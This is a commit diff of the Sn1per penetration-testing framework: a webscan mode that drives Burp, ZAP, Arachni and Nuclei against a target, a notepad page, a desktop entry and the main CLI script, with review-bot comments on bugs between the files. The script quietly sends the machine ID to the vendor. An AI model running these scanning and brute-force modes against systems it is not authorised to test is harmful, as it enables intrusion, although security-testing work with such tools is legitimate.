echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
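Review bot: the Nikto post-processing line `sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port${PORT}.txt` has two defects: GNU sed parses `-ir` as `-i` with backup suffix `r`, so every report leaves a stray `...txtr` file behind, and `&lh;` is not an HTML entity, so the `<` characters are turned into text the report viewer cannot render as less-than signs; use `sed -i 's/</\&lt;/g' "$file"`. In the same block the Arachni call targets `http://$TARGET:$PORT` although this branch sets `SSL="true"` and every other tool scans `https://$TARGET:${PORT}`, so Arachni reports on a different service (or a closed port) than the rest of the loot, and the CMSmap output files are named `-http-port` while the scan is over https. Also worth confirming against each plugin's argument parser: `--sVl` is passed to both clusterd and shocker.py where `--ssl` looks intended. The Burp section polls hard-coded task IDs 1..30 rather than the task ID returned in the `Location` header of the POST response, so on a shared Burp instance it blocks on, and reports, scans that are not this target's, and the inner `while` has no timeout.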

165
modes/webscan.sh Normal file
View File

@@ -0,0 +1,165 @@
if [[ "$MODE" = "webscan" ]]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: http://$TARGET/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
sleep 5
echo "[i] Scanning: https://$TARGET/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET/"
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
PORT="80"
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
DATE=$(date +"%Y%m%d%H%M")
PORT="443"
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives https://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-${TARGET}-port80.txt
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-${TARGET}-port443.txt
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
loot
exit
fi
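Review bot: `loot` at the end of this mode runs unconditionally, while the other modes guard it with `if [[ "$LOOT" = "1" ]]`, so `-nl|--noloot` (which sets `LOOT="0"`) is silently ignored in webscan mode; wrap the call the same way. The Burp section submits two scans but then polls hard-coded task IDs 1..30 instead of the IDs returned in the two POST responses' `Location` headers, and the inner `while` loop never times out, so one scan stuck with work `remaining` stalls the whole pipeline. Both ZAP runs write through the shared `/usr/share/sniper/bin/zap-report.txt`; since the `running_*.txt` counter implies several tasks can run concurrently, parallel webscans will overwrite each other's reports, so a per-run temporary file keyed by `$TARGET` and `$DATE` is safer. Minor: `echo "$TARGET $MODE ..." 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null` redirects stderr twice.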

37
pro/notepad.html Normal file
View File

@@ -0,0 +1,37 @@
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Notepad App</title>
<meta charset="utf-8">
<!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<style>
html,body{background:#FCFCFC;color:#444;height:100%;width:100%;margin:0;padding:0;overflow:hidden}
#notepad{height:100%;width:100%;padding:1%;font-size:12px;line-height:100%;font-family:Menlo,Monaco,Consolas,"Courier New",monospace;box-sizing:border-box}
::selection{background:#7D7}
::-moz-selection{background:#7D7}
</style>
</head>
<body>
<textarea placeholder="Type here, see it here..." id="notepad">
<!--
you could do any element w/ contentEditable, but that doesn't fire onchange
-->
</textarea>
<script>
/* localstorage polyfill from https://gist.github.com/350433 */
("undefined"==typeof window.localStorage||"undefined"==typeof window.sessionStorage)&&function(){function e(f){function e(a){var b;b=new Date;b.setTime(b.getTime()+31536E6);document.cookie="localStorage="+a+("; expires="+b.toGMTString())+"; path=/"}function g(a){a=JSON.stringify(a);"session"==f?window.name=a:e(a)}var d=function(){var a;if("session"==f)a=window.name;else a:{a=document.cookie.split(";");var b,c;for(b=0;b<a.length;b++){for(c=a[b];" "==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf("localStorage=")){a=
c.substring(13,c.length);break a}}a=null}return a?JSON.parse(a):{}}();return{length:0,clear:function(){d={};this.length=0;"session"==f?window.name="":e("")},getItem:function(a){return void 0===d[a]?null:d[a]},key:function(a){var b=0,c;for(c in d){if(b==a)return c;b++}return null},removeItem:function(a){delete d[a];this.length--;g(d)},setItem:function(a,b){d[a]=b+"";this.length++;g(d)}}}if("undefined"==typeof window.localStorage)window.localStorage=new e("local");if("undefined"==typeof window.sessionStorage)window.sessionStorage=
new e("session")}();
/* the code */
var n = document.getElementById("notepad");
/* save */
var s = function(){localStorage.setItem("notepad", n.value);}
/* retrieve (only on page load) */
if(window.localStorage){ n.value = localStorage.getItem("notepad");}
/* autosave onchange and every 500ms and when you close the window */
n.onchange = s();
setInterval( s, 500);
window.onunload = s();
</script>
</body></html>
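Review bot: `n.onchange = s();` and `window.onunload = s();` call `s` once at load time and assign its return value (`undefined`) as the handler, so neither the change nor the unload event ever saves; they should read `n.onchange = s;` and `window.onunload = s;` (today only the 500 ms `setInterval` is doing the saving). The IE conditional comment loads `html5.js` from `http://html5shiv.googlecode.com/...`, an unauthenticated origin that no longer exists; pulling third-party script over plain HTTP into the Sn1per Pro UI is an avoidable script-injection exposure, so drop the include or ship a local copy. Minor: the page declares `charset=US-ASCII` in the `http-equiv` meta and `utf-8` in the following meta; keep one.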

12
sn1per.desktop Normal file
View File

@@ -0,0 +1,12 @@
[Desktop Entry]
Name=sn1per
Encoding=UTF-8
Exec=bash-wrapper "sudo sniper"
Icon=/usr/share/pixmaps/sn1per.png
StartupNotify=false
Terminal=true
Type=Application
Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering;
X-Kali-Package=sn1per
Comment=
Path=
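Review bot: `Comment=` and `Path=` are left empty and `Encoding=UTF-8` is a deprecated key in the Desktop Entry specification (UTF-8 is the only permitted encoding, and `desktop-file-validate` warns about the key), so either fill the two fields or remove all three lines. `Exec=bash-wrapper "sudo sniper"` also depends on a `bash-wrapper` helper being on PATH and on the launching user holding sudo rights, neither of which the entry or the docs in this commit state.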

BIN
sn1per.png Normal file

Binary file not shown.


693
sniper Normal file
View File

@@ -0,0 +1,693 @@
#!/bin/bash
# + -- --=[Sn1per Community Edition by @xer0dayz
# + -- --=[https://sn1persecurity.com
#
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
VER="9.2"
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
SNIPER_PRO=$INSTALL_DIR/pro.sh
# INIT POSTGRESQL
service postgresql start 2> /dev/null
# LOAD DEFAULT SNIPER CONFIGURATION FILE
dos2unix $INSTALL_DIR/sniper.conf 2> /dev/null > /dev/null
source $INSTALL_DIR/sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from $INSTALL_DIR/sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ -f /root/.sniper.conf ]]; then
# LOAD USER SN1PER CONFIGURATION FILE
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from /root/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ -f /root/.sniper_api_keys.conf ]]; then
# LOAD USER API KEYS (PERSISTENT CONFIG)
dos2unix /root/.sniper_api_keys.conf 2> /dev/null > /dev/null
source /root/.sniper_api_keys.conf
echo -e "$OKBLUE[*]$RESET Loaded API keys from /root/.sniper_api_keys.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
else
# IF NO USER CONFIG PRESENT, CREATE IT FROM THE DEFAULT TEMPLATE
cp $INSTALL_DIR/sniper.conf /root/.sniper.conf 2> /dev/null
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from /root/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
function help {
logo
local star
printf -v star "$OKBLUE[*]$RESET"
cat <<EOHELP
$star NORMAL MODE
sniper -t <TARGET>
$star SPECIFY CUSTOM CONFIG FILE
sniper -c /full/path/to/sniper.conf -t <TARGET> -m <MODE> -w <WORKSPACE>
$star NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re
$star STEALTH MODE + OSINT + RECON
sniper -t <TARGET> -m stealth -o -re
$star DISCOVER MODE
sniper -t <CIDR> -m discover -w <WORSPACE_ALIAS>
$star SCAN ONLY SPECIFIC PORT
sniper -t <TARGET> -m port -p <portnum>
$star FULLPORTONLY SCAN MODE
sniper -t <TARGET> -fp
$star WEB MODE - PORT 80 + 443 ONLY!
sniper -t <TARGET> -m web
$star HTTP WEB PORT MODE
sniper -t <TARGET> -m webporthttp -p <port>
$star HTTPS WEB PORT MODE
sniper -t <TARGET> -m webporthttps -p <port>
$star HTTP WEBSCAN MODE
sniper -t <TARGET> -m webscan
$star ENABLE BRUTEFORCE
sniper -t <TARGET> -b
$star AIRSTRIKE MODE
sniper -f targets.txt -m airstrike
$star NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f targets.txt -m nuke -w <WORKSPACE_ALIAS>
$star MASS PORT SCAN MODE
sniper -f targets.txt -m massportscan -w <WORKSPACE_ALIAS>
$star MASS WEB SCAN MODE
sniper -f targets.txt -m massweb -w <WORKSPACE_ALIAS>
$star MASS WEBSCAN SCAN MODE
sniper -f targets.txt -m masswebscan -w <WORKSPACE_ALIAS>
$star MASS VULN SCAN MODE
sniper -f targets.txt -m massvulnscan -w <WORKSPACE_ALIAS>
$star PORT SCAN MODE
sniper -t <TARGET> -m port -p <PORT_NUM>
$star LIST WORKSPACES
sniper --list
$star DELETE WORKSPACE
sniper -w <WORKSPACE_ALIAS> -d
$star DELETE HOST FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh
$star DELETE TASKS FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dt
$star GET SNIPER SCAN STATUS
sniper --status
$star LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
$star LOOT REIMPORTALL FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimportall
$star LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reload
$star LOOT EXPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --export
$star SCHEDULED SCANS
sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly
$star USE A CUSTOM CONFIG
sniper -c /path/to/sniper.conf -t <TARGET> -w <WORKSPACE_ALIAS>
$star UPDATE SNIPER
sniper -u|--update
EOHELP
exit
}
function logo {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com$RESET"
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz$RESET"
echo ""
}
function sniper_status {
watch -n 1 -c 'ps -ef | egrep "sniper|slurp|hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget|nikto" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
}
# CHECK FOR UPDATES
function check_update {
if [[ "$ENABLE_AUTO_UPDATES" == "1" ]] && [[ "$ONLINE" == "1" ]]; then
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ "$LATEST_VER" != "$VER" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
fi
fi
touch /tmp/update-check.txt 2> /dev/null
}
# APPLY UPDATES
function update {
logo
echo -e "$OKBLUE[*]$RESET Checking for updates...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ "$ONLINE" == "0" ]]; then
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
else
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ "$LATEST_VER" != "$VER" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
read ans
if [[ "$ans" = "y" ]]; then
rm -Rf /tmp/Sn1per/ 2>/dev/null
git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
cd /tmp/Sn1per/
chmod +rx install.sh
bash install.sh
rm -Rf /tmp/Sn1per/ 2>/dev/null
exit
fi
fi
fi
}
if [[ "$UPDATE" = "1" ]]; then
update
exit
fi
# CHECK IF ONLINE
function check_online {
ONLINE=$(curl --connect-timeout 3 --insecure -s "https://sn1persecurity.com/community/updates.txt?$VER&mid=$(cat /etc/machine-id)" 2> /dev/null)
if [[ -z "$ONLINE" ]]; then
ONLINE=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ -z "$ONLINE" ]]; then
ONLINE="0"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKRED}FAIL${RESET}$OKBLUE]"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET sniper is running in offline mode.$RESET"
else
ONLINE="1"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
else
ONLINE="1"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
}
# COMMAND LINE SWITCHES
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
-h|--help)
help
shift # past argument
;;
-c|--config)
CONFIG="$2"
echo -e "$OKBLUE[*]$RESET Creating backup of existing config to /root/.sniper.conf.bak...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cp -f /root/.sniper.conf /root/.sniper.conf.bak
echo -e "$OKBLUE[*]$RESET Copying $CONFIG to /root/.sniper.conf...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cp -f $CONFIG /root/.sniper.conf 2> /dev/null
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
sleep 1
shift
shift
;;
-t)
TARGET="$2"
shift # past argument
shift # past argument
;;
-b)
AUTO_BRUTE="1"
shift # past argument
;;
-fp|--fullportscan)
FULLNMAPSCAN="1"
shift # past argument
;;
-o|--osint)
OSINT="1"
shift # past argument
;;
-re|--recon)
RECON="1"
shift # past argument
;;
-m)
MODE="$2"
shift # past argument
shift # past argument
;;
-p)
PORT="$2"
shift # past argument
shift # past argument
;;
-f|--file)
FILE="$(realpath $2)"
shift # past argument
shift # past argument
;;
-ri|--reimport)
REIMPORT="1"
shift # past argument
;;
-ria|--reimportall)
REIMPORT_ALL="1"
shift # past argument
;;
-rl|--reload)
RELOAD="1"
shift # past argument
;;
-n|--noreport)
REPORT="0"
shift # past argument
;;
-nl|--noloot)
LOOT="0"
NOLOOT="1"
shift # past argument
;;
-w)
WORKSPACE="$(echo $2 | tr / -)"
WORKSPACE_DIR="$INSTALL_DIR/loot/workspace/$WORKSPACE"
shift # past argument
shift # past argument
;;
-s|--schedule)
if [[ -z "$WORKSPACE" ]]; then
echo "You need to set a workspace via the -w switch to schedule a scan task."
exit
fi
SCHEDULE_ARG="$2"
if [[ "$SCHEDULE_ARG" = "daily" ]] || [[ "$SCHEDULE_ARG" = "weekly" ]] || [[ "$SCHEDULE_ARG" = "monthly" ]]; then
SCHEDULE_TASK="$WORKSPACE_DIR/scans/scheduled/$SCHEDULE_ARG.sh"
vim $SCHEDULE_TASK
cat $WORKSPACE_DIR/scans/scheduled/*.sh 2> /dev/null
exit
else
echo "You need to specify either daily, weekly or monthly for the scheduled scan argument."
exit
fi
shift # past argument
shift # past argument
;;
-d|--delete)
logo
echo "Are you sure you want to remove the following workspace? (Hit Ctrl+C to exit): /usr/share/sniper/loot/workspace/$WORKSPACE/"
read ANS
rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/
echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed."
sniper -w default --reimport
exit
shift # past argument
;;
-dh|--delete-host)
echo "Removing $TARGET from $WORKSPACE"
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/* $WORKSPACE_DIR/reports/host-table-report.csv
egrep -R "$TARGET" $WORKSPACE_DIR/domains/* $WORKSPACE_DIR/reports/host-table-report.csv
rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/dns-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/ports-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/web/title-*-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/web/headers-*-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null
#sniper --reimportall -w $WORKSPACE
exit
shift # past argument
;;
-dt|--delete-task)
echo "Removing all running $TARGET tasks from $WORKSPACE"
rm -vf $WORKSPACE_DIR/scans/running_$TARGET_*.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $WORKSPACE_DIR/scans/tasks-running.txt 2> /dev/null
ps -ef | egrep "$TARGET|sniper"
ps -ef | egrep "sniper" | awk '{print $2}' | xargs -i sudo kill -9 {}
exit
shift # past argument
;;
--list)
logo
ls -l $INSTALL_DIR/loot/workspace/
echo ""
echo "cd /usr/share/sniper/loot/workspace/"
WORKSPACE_REPORT=$LOOT_DIR/sniper-report.html
if [[ -f $WORKSPACE_REPORT ]]; then
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
$BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null &
else
echo -e "$OKORANGE + -- --=[ Loading workspaces...$RESET"
$BROWSER $INSTALL_DIR/loot/workspace/ 2> /dev/null > /dev/null &
fi
exit
shift
;;
--export)
if [[ -z "$WORKSPACE" ]]; then
